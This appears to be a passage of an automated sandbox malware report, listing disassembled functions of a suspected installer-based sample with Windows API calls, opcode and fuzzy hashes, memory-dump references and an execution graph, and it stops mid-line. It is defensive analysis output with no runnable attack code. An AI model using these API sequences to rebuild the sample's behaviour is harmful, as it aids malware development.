                                                                                                      • API ID: lstrcatwsprintf
                                                                                                      • String ID: %02x%c$...
                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                      Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                      Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1599320355-0
                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                      Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                      • String ID: Version
                                                                                                      • API String ID: 512980652-315105994
                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                      Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2102729457-0
                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                      Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2883127279-0
                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                      Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                      Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                      • String ID: !N~
                                                                                                      • API String ID: 623250636-529124213
                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                      Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                      Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                      Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:15.1%
                                                                                                      Total number of Nodes:166
                                                                                                      Total number of Limit Nodes:2
                                                                                                      execution_graph 80889 2453ca21140 80892 2453ca21160 80889->80892 80891 2453ca21156 80893 2453ca2118b 80892->80893 80894 2453ca211b9 80892->80894 80893->80894 80895 2453ca21190 80893->80895 80896 2453ca211c7 _amsg_exit 80894->80896 80897 2453ca211d3 80894->80897 80895->80894 80898 2453ca211a0 Sleep 80895->80898 80896->80897 80899 2453ca2121a 80897->80899 80900 2453ca21201 _initterm 80897->80900 80898->80894 80898->80895 80917 2453ca21880 80899->80917 80900->80899 80902 2453ca21247 SetUnhandledExceptionFilter 80903 2453ca2126a 80902->80903 80904 2453ca2126f malloc 80903->80904 80905 2453ca2128b 80904->80905 80908 2453ca212d2 80904->80908 80906 2453ca212a0 strlen malloc memcpy 80905->80906 80906->80906 80907 2453ca212d0 80906->80907 80907->80908 80924 2453ca2e6f0 80908->80924 80911 2453ca21344 80915 2453ca21160 47 API calls 80911->80915 80912 2453ca21324 80913 2453ca21338 80912->80913 80914 2453ca2132d _cexit 80912->80914 80913->80891 80914->80913 80916 2453ca21366 80915->80916 80916->80891 80918 2453ca218a2 80917->80918 80920 2453ca21a0f 80917->80920 80919 2453ca2199e 80918->80919 80918->80920 80922 2453ca21956 80918->80922 80919->80920 80923 2453ca219e9 VirtualProtect 80919->80923 80920->80902 80922->80919 81029 2453ca21ba0 VirtualQuery VirtualProtect memcpy GetLastError 80922->81029 80923->80919 80926 2453ca2e706 80924->80926 80925 2453ca2e7fc wcslen 81030 2453ca2153f 80925->81030 80926->80925 80929 2453ca21315 80929->80911 80929->80912 80931 2453ca2e8b3 80932 2453ca2e8f9 80931->80932 81058 2453ca2156c malloc 80931->81058 80935 2453ca2e903 memset wcscat memset 80932->80935 80934 2453ca2e8e9 80934->80932 81059 2453ca2145e malloc 80934->81059 80938 2453ca2e95b 80935->80938 80937 2453ca2e9ab wcslen 80939 2453ca2e9bd 80937->80939 80943 2453ca2e9fc 80937->80943 80938->80937 80940 2453ca2e9d0 _wcsnicmp 80939->80940 80941 2453ca2e9e6 wcslen 80940->80941 80940->80943 80941->80940 80941->80943 80942 2453ca2ea5d wcscpy wcscat memset 80945 2453ca2ea9f 80942->80945 80943->80942 80944 2453ca2eba7 wcscpy wcscat memset 80946 2453ca2ebed 80944->80946 80945->80944 80947 2453ca2ec30 wcscpy wcscat memset 80946->80947 80948 2453ca2ec76 80947->80948 80949 2453ca2ecd9 wcscpy wcscat memset 80948->80949 80950 2453ca2ed1f 80949->80950 80951 2453ca2ed4f wcscpy wcscat memset 80950->80951 80953 2453ca2ed98 80951->80953 80952 2453ca2ede8 wcslen 80954 2453ca2edfa 80952->80954 80955 2453ca2ee37 wcscat memset 80952->80955 80953->80952 80956 2453ca2ee10 _wcsnicmp 80954->80956 80959 2453ca2eec8 80955->80959 80956->80955 80958 2453ca2ee22 wcslen 80956->80958 80958->80955 80958->80956 80960 2453ca2ef38 wcscpy wcscat 80959->80960 80961 2453ca2ef6a 80960->80961 80962 2453ca30252 memcpy 80961->80962 80963 2453ca2f0bc 80961->80963 80962->80963 80964 2453ca2f4cd wcslen 80963->80964 80965 2453ca2153f malloc 80964->80965 80966 2453ca2f55f 80965->80966 81060 2453ca2145e malloc 80966->81060 80968 2453ca2f570 80969 2453ca2fe96 80968->80969 81061 2453ca214a9 malloc 80968->81061 81087 2453ca2145e malloc 80969->81087 80972 2453ca2f5c4 srand 80973 2453ca2f5dd 80972->80973 81062 2453ca2155d malloc 80973->81062 80975 2453ca2f7ae 81064 2453ca214c7 malloc 80975->81064 80977 2453ca2f7ce 81065 2453ca21503 malloc 80977->81065 80978 2453ca2f6b9 80978->80975 80979 2453ca2f742 wcsncmp 80978->80979 80983 2453ca30297 80978->80983 81063 2453ca214e5 malloc 80979->81063 80982 2453ca2f7fb memset 80982->80983 80984 2453ca2f82b 6 API calls 80982->80984 81066 2453ca214a9 malloc 80984->81066 80987 2453ca2f969 81067 2453ca214a9 malloc 80987->81067 80989 2453ca2fac4 81068 2453ca214f4 malloc 80989->81068 80991 2453ca2fb74 81069 2453ca214c7 malloc 80991->81069 80993 2453ca2fb94 81070 2453ca214c7 malloc 80993->81070 80995 2453ca2fbb3 81071 2453ca2145e malloc 80995->81071 80997 2453ca2fbbf 81072 2453ca2145e malloc 80997->81072 80999 2453ca2fbcb 81000 2453ca2fe15 80999->81000 81073 2453ca214a9 malloc 80999->81073 81085 2453ca214c7 malloc 81000->81085 81003 2453ca2fe88 81003->80969 81086 2453ca2145e malloc 81003->81086 81004 2453ca2fc25 81005 2453ca2fe1e 81004->81005 81006 2453ca2fc34 81004->81006 81082 2453ca215c6 malloc 81005->81082 81074 2453ca214b8 malloc 81006->81074 81010 2453ca2fd61 memset 81077 